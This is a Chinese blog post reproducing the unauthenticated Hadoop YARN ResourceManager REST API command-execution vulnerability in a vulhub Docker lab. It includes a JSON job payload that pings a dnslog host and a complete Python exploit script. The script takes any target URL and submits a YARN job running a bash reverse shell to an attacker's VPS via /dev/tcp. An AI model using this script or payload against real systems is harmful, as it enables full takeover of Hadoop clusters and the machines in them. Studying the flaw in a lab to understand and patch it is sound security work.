Hadoop 漏洞复现

已于 2022-10-27 16:38:29 修改
阅读量5.9k 收藏 8
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2022-08-01 16:05:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrHatSec/article/details/126103268
版权

一、漏洞描述

Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。Apache Hadoop YARN是Hadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,并调度要在不同集群节点上执行的任务。(独立出的资源管理框架,负责资源管理和调度)

漏洞产生原因

负责对资源进行同一管理调度的 ReasourceManager 组件的UI管理界面开放在 8080/8088 端口,攻击者无需认证即可通过REST API 部署任务来执行任意命令,最终可完全控制集群中所有的机器

二、环境搭建

cd vulhub/hadoop/unauthorized-yarn

启动环境

docker-compose up -d

在这里插入图片描述
访问 8088 端口
在这里插入图片描述

三、漏洞复现

首先访问(POST请求) /ws/v1/cluster/apps/new-application 获取 application-id
在这里插入图片描述
获取到 application-id 之后,我们访问 /ws/v1/cluster/apps 页面,并且构造 Payload

{"application-id": "application_1659336607746_0001", "application-name": "getshell", "am-container-spec": {"commands": {"command": "ping -c 3 test.clw7xm.dnslog.cn"}}, "application-type": "YARN"}

修改 application-id 的值和你要执行的命令 command
在这里插入图片描述
漏洞利用成功
在这里插入图片描述

四、Exp脚本

# coding:utf-8

import requests

def shell(url,vps_ip,port):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)
    id = response.json()["application-id"]
    data = {
        'application-id': id,
        'application-name': 'getshell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)
            },
        },
        'application-type': 'YARN'}
    exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)
    print("[+] 执行完成!")


if __name__ == '__main__':
    url = input("url:")
    vps_ip = input("vps:")
    port = input("port:")
    shell(url,vps_ip,port)

vps 上监听一个端口
在这里插入图片描述
使用脚本反弹 shell
在这里插入图片描述
利用成功,成功反弹 Shell
在这里插入图片描述

在这里插入图片描述

MrHatSec
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web渗透测试漏洞复现Hadoop 未授权访问漏洞复现并getshell
HACKONE的博客
03-28 590
Hadoop是一个开源的分布式计算框架,由Apache软件基金会开发并维护。Hadoop主要用于处理和分析海量数据集,能够在由普通硬件构成的大规模集群上运行,具备高可靠性和高扩展性。HDFS是一个高度容错性的分布式文件系统,设计用于在廉价硬件上存储海量数据。数据会被切割成块并分布在集群中的多个节点上,以实现数据冗余和故障恢复。MapReduce:MapReduce是一个分布式编程模型,用于处理大规模数据集。它将复杂的计算任务拆分成两个主要阶段:Map阶段和Reduce阶段,允许数据并行处理。
Hadoop YARN ResourceManager 未授权访问getshell
09-23
利用Hadoop YARN ResourceManager 未授权访问getshell工具以及WORD说明
未授权访问:Hadoop 未授权访问漏洞
qq_68163788的博客
05-20 1114
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
hadoop漏洞_Hadoop 未授权访问漏洞(exp核心代码实现)
weixin_35758982的博客
12-06 8401
一、环境搭建:进入镜像目录:cd vulhub/hadoop/unauthorized-yarn启动环境:docker-compose up -d访问8088端口二、漏洞描述:Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。Apache Hadoop YARN是Hadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,...
hadoop未授权访问命令执行漏洞复现-vulfocus
c0529的博客
06-10 541
Hadoop YARN(Yet Another Resource Negotiator)的ResourceManager是集群资源管理的核心组件,负责分配和管理集群资源以及调度作业。如果ResourceManager出现未授权访问漏洞,可能允许未经认证的用户访问或操作集群资源,这可能会导致数据泄露、资源滥用或拒绝服务攻击。在这个复现中就是在组件的ui界面上出现了未授权访问漏洞
Hadopp未授权访问导致RCE
qq_69775412的博客
01-25 887
Hadoop是一个开源的分布式计算框架,用于处理大规模数据集的存储和处理。它基于Google的MapReduce算法和Google File System(GFS)的论文,旨在提供一个可靠、可扩展、分布式存储和处理大规模数据的解决方案。漏洞产生原因:负责对资源进行同一管理调度的 ReasourceManager 组件的UI管理界面开放在 8080/8088 端口,攻击者无需认证即可通过REST API 部署任务来执行任意命令,最终可完全控制集群中所有的机器。
Hadoop-yarn-未授权访问漏洞
Biu_Biu_Bi的博客
01-04 3142
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&未授权访问&RCE-漏洞复现
ran的博客
05-05 3147
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
数据库安全Hadoop 未授权访问-命令执行漏洞.
网络安全领域___专研者.
11-10 3525
Hadoop 未授权访问主要因HadoopYARN资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
Hadoop生态漏洞修复记录
manweizhizhuxia的博客
03-28 2961
Hadoop、zookeeper、hive漏洞修复
修复hadoop漏洞 返回401漏洞
最新发布
06-28
修复hadoop漏洞 返回401漏洞
hadoop 3.1.4
10-03
Hadoop 3.1.4 是 Apache 软件基金会发布的一个重要版本,它作为大数据处理的核心框架,为用户提供了高效、可靠的分布式计算能力。在这个版本中,Hadoop 进行了多方面的优化和增强,使得它在处理海量数据时性能更优,...
hadoop3.3.4 winutils
12-18
Hadoop是大数据处理领域的重要框架,它以分布式计算模型为基础,提供高可靠性和高扩展性的数据存储和处理能力。在Windows环境下配置和运行Hadoop通常比在Linux上更为复杂,因为Hadoop最初是为Unix-like系统设计的。...
docker配置hadoop
09-28
001
Hadoop未授权访问漏洞复现(1),这些面试题你会吗
m0_61331367的博客
04-05 1048
0x02POC代码如下import systarget = ‘http://123.249.12.36’#目标iplhost = ‘39.105.1.75’ #将你的本地ip填在这里,使用nc监听55588端口data = {},},#0x03启动nc监听,nc.exe -lvvp 55588。
hadoop应用开发技术..._渗透技巧Hadoop命令执行
weixin_39895486的博客
11-29 266
0X00Hadoop介绍和漏洞原理Hadoop是一个由Apache的分布式系统基础架构,用户可开发分布式程序,充分利用集群的威力进行高速运算和存储,实现了一个分布式文件系统(Hadoop Distributed File System)。其中HDFS组件有高容错性的特点,并且部署在低廉的(low-cost)硬件上即可提供高吞吐量(high throughput)来访问应用程序的数...
Hadoop-未授权访问漏洞复现
weixin_42090431的博客
04-27 736
1、搭建环境 2、访问:http://your-ip:8088。3、EXP 监听9999端口。
hadoop常用的漏洞利用方法
05-27
以下是一些常用的 Hadoop 漏洞利用方法: 1. 未授权访问漏洞:如果 Hadoop 未正确配置,攻击者可以轻易地访问和控制 Hadoop 服务器,从而获取敏感信息或造成破坏。 2. 路径遍历漏洞:攻击者可以利用路径遍历漏洞,访问服务器上的敏感文件,从而获取敏感信息或控制服务器。 3. 认证绕过漏洞:攻击者可以利用某些漏洞或弱口令等方式,绕过身份验证机制,从而访问和控制 Hadoop 服务器。 4. 拒绝服务攻击漏洞:攻击者可以通过发送大量的恶意请求,或利用某些漏洞,让 Hadoop 服务器崩溃或无法响应,从而导致服务停止或数据丢失。 5. XML外部实体注入漏洞:攻击者可以利用 XML 外部实体注入漏洞,构造恶意的 XML 数据,从而读取或修改服务器上的文件,甚至执行任意代码。 总之,为了保护 Hadoop 服务器的安全,需要加强对服务器的安全管理和监控,及时修补安全漏洞,提高人员的安全意识和技能。此外,建议使用更加安全的身份验证机制,例如 OAuth、LDAP 等,并且配置合适的访问控制策略,限制不必要的访问。同时,也可以考虑使用开源的 Hadoop 安全扫描工具,例如 Hadoop Security Scanner,来加强对 Hadoop 服务器的安全检测和防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值